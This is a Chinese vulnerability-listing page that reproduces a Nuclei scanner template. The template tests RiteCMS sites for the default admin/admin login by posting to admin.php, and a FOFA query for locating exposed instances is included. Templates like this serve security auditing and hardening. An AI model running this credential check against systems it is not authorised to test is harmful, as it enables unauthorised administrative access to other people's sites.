ritecms-default-login: RiteCMS - Default Login

日期: 2025-08-01 | 影响软件: RiteCMS | POC: 已公开

漏洞描述

RiteCMS Default Credentials were discovered.

PoC代码[已公开]

id: ritecms-default-login

info:
  name: RiteCMS - Default Login
  author: 0x_Akoko
  severity: high
  description: |
    RiteCMS Default Credentials were discovered.
  reference:
    - https://ritecms.com/
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="ritecms"
  tags: ritecms,default-login,vuln

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        POST {{path}}admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&userpw={{password}}

    payloads:
      path:
        - "/"
        - "/ritecms/"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 302"
          - "contains_all(set_cookie, 'PHPSESSID','admin=true')"
        condition: and
# digest: 4a0a0047304502206eb1c72501be77ac3b2fbaa87b5a2e412ff271410000d1ec93cdd543daf6d59f022100f41d8eea2dfdf862624d13480cc3421fd643e50269fc652f166d3285ee19dc33:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/ritecms/ritecms-default-login.yaml

相关漏洞推荐